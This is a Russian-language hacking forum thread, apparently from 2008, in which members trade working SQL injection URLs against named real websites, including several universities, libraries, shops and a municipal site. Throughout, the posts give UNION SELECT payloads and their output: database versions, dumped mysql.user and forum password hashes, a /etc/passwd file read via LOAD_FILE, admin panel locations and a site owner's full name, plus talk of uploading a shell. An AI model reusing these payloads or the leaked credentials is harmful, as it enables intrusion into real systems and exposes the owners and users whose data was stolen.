
24.10.2008, 21:22
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
Boston University
Код:
http://www.bu.edu/phpbin/news/releases/display.php?id=-1552+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,unhex(hex(version()))/*
PR=8!
там где-то даже админка есть...
|
|
|

24.10.2008, 22:04
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами:
10077446
Репутация:
3965
|
|
freeware32.ru (89.111.184.177) Google PR 4 / 10
Яндекс тІЦ 210 Database Version: 5.0.42
Database name: freeware32
User name: makarich@localhost
Сообщение от Dimi4
http://freeware32.ru/index.php?name=NOD32&program=7+UNION+SELECT+1,2,3+ LIMIT+1,1--
+
http://freeware32.ru/index.php?name=NOD32&program=7+UNION+SELECT+LOAD_F ILE(0x2F6574632F706173737764),2,3+LIMIT+1,1--
/etc/passwd:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
man:x:13:15:man:/usr/share/man:/bin/false
postmaster:x:14:12:postmaster:/var/spool/mail:/bin/false
postgres:x:70:70::/var/lib/postgresql:/bin/bash
nut:x:84:84:nut:/var/state/nut:/bin/false
postfix:x:207:207:postfix:/var/spool/postfix:/bin/false
smmsp:x:209:209:smmsp:/var/spool/mqueue:/bin/false
portage:x:250:250:portage:/var/tmp/portage:/bin/false
nobody:x:65534:65534:nobody:/:/bin/false
sshd:x:22:22:added by portage for openssh:/var/empty:/usr/sbin/nologin
mysql:x:60:60:added by portage for mysql:/dev/null:/sbin/nologin
cron:x:16:16:added by portage for cronbase:/var/spool/cron:/sbin/nologin
ftp:x:21:21:added by portage for ftpbase:/home/ftp:/sbin/nologin
proftpd:x:101:407:added by portage for proftpd:/dev/null:/sbin/nologin
apache:x:81:81:added by portage for apache:/var/www:/sbin/nologin
webmaster:x:1000:1000:Yuriy Makaev:/home/webmaster:/bin/bash
dovecot:x:97:97:added by portage for dovecot:/dev/null:/sbin/nologin
rpc:x:111:111:added by portage for portmap:/dev/null:/sbin/nologin
named:x:40:40:added by portage for bind:/etc/bind:/sbin/nologin
Robots.txt:
User-agent: *
Disallow: go.php
Disallow: program.php
Disallow: /banners/
Раскрытые пути:
/home/webmaster/www/freeware32.ru/
Последний раз редактировалось Dimi4; 24.10.2008 в 22:07..
|
|
|

24.10.2008, 22:30
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
Dimi4
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,table_name))),2,3+from+informat ion_schema.tables+limit+17,1--
таблы..
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,user,password))),2,3+from+mysql .user+limit+1,1--
рут..
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,table_name,table_schema))),2,3+ from+information_schema.columns+where+column_name+ like+char(112,97,115,115,119,111,114,100)+limit+1, 1--
таблицы с паролями..
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,username,user_password))),2,3+f rom+forum.phpbb_users+limit+2,1--
makarich: $H$93X6wK/iq5UvwhwhZXbbnU.RT7gb0W.
жаль так бы шелл залили..
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,password))),2,3+from+freeware32 .persons+limit+1,1--
пассы юзеров.. хешшированые.
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,password))),2,3+from+persons+li mit+1,1--
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,password))),2,3+from+admin+limi t+1,1--
админ.. кто разшефрует будет хорошо )
а вот и freeware32.ru/admin
Последний раз редактировалось sabe; 24.10.2008 в 22:55..
|
|
|

25.10.2008, 01:19
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
мда, там вообще не поймешь что:
Макаев Юрий Александрович:1$MgT.b/LSoOE
и админка все-равно защищена .htaccess
|
|
|

25.10.2008, 10:35
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
продолжаем серию .edu ...
Sioux Falls Seminary(сам не знаю что это значит... =) )
Код:
http://www.sfseminary.edu/about/index.php?id=9&entryid=-111+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15/*
PR=6
4.1.25-Debian_mt1
-----------------------------------------------------------------
Northwest University
Код:
http://www.northwestu.edu/calendar/view.php?id=-3151+union+select+1,2,3,concat(user,0x3a,password,0x3a,host,0x3a,file_priv),5,6,7,8,9,10,11,12+from+mysql.user/*
PR=6
5.0.45-community-nt
mysql.user
root:*DBC28C7CE578D4A87947FC392EFE7B9A95D2E88B:loc alhost
devin.ellis:*001FD03A448FDAA34AE4EEC54A6269A02931D F74:chilen0:%
dennis.williams:*585198B8A7F5B514497FDE9FC1243891A 80020C8:ba1l3y00:%
odbc:*DBC28C7CE578D4A87947FC392EFE7B9A95D2E88B:%
eagle:*B15F472DD2E0C69902402108AA80A721C1EF107F:lo calhost
eagle:*B15F472DD2E0C69902402108AA80A721C1EF107F:%
Путь: W:\northwestu\calendar\view.php
-----------------------------------------------------------------
Х.З что...
Код:
http://www.art.uiowa.edu/directory.php?id=-44+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables+limit+18,1/*
PR=6
5.0.26-log
-----------------------------------------------------------------
Тоже х.з что...
Код:
https://cat.ipac.caltech.edu/sscconf07/view_abstract.php?id=-85+union+select+1,2,version(),4/*
5.0.27-standard
Последний раз редактировалось Iceangel_; 25.10.2008 в 11:55..
|
|
|

25.10.2008, 18:39
|
|
Banned
Регистрация: 23.02.2008
Сообщений: 268
С нами:
9586096
Репутация:
850
|
|
http://www.fotosale.com.ua/index.php?mod=prodList&cid=1&bid=-99+union+select+1,2,3,4,5,6,7,8,9,0,10,12,13,14,15 ,16,17/*
5 поле
|
|
|

26.10.2008, 10:26
|
|
Познающий
Регистрация: 26.12.2007
Сообщений: 43
С нами:
9671366
Репутация:
9
|
|
http://www.weightonline.com.au/products.php?pid=-89+UniON+Select+1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
версия 5.0.45-COMMUNITY
админки не нашёл(
|
|
|

26.10.2008, 10:30
|
|
Познающий
Регистрация: 26.12.2007
Сообщений: 43
С нами:
9671366
Репутация:
9
|
|
http://www.winelistaustralia.com.au/wineShow.php?pid=1033'
инклудидтся, только админка прикрыта(
|
|
|

26.10.2008, 11:48
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
А не подскажите...
Можно ли провести тут инъекцию? И в какую сторону копать?
Код:
_http://la2.raid.ru/index.php?act=clan_info&id=1
|
|
|

26.10.2008, 12:26
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами:
10242288
Репутация:
536
|
|
Разные разности:
Код:
http://www.owensound.library.on.ca/news-full.php?NewsID=99999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9/*
http://www.spec.bc.ca/news/news.php?newsID=999999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7--
http://www.1049thebeach.ca/news_item.php?NewsID=9999999+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17,18,19,20,21,22/*
http://www.nlc.bc.ca/public.news.php?NewsActiveList=newsdetails&NewsID=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.onlc.ca/newsfull.php?NewsID=999999+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9/*
http://www.myheritage.es/FP/newsItem.php?s=786&newsID=99999+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11/*&sourceList=dir
http://www.vibez.us/en/products/detail_mp3.php?pid=99999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*&page=3
http://www.park-ridge.il.us/record.php?_ID=99999+union+select+1,concat_ws(0x3a,username,PASSWORD,ip),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+prkhome_ciab.ciab_member
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|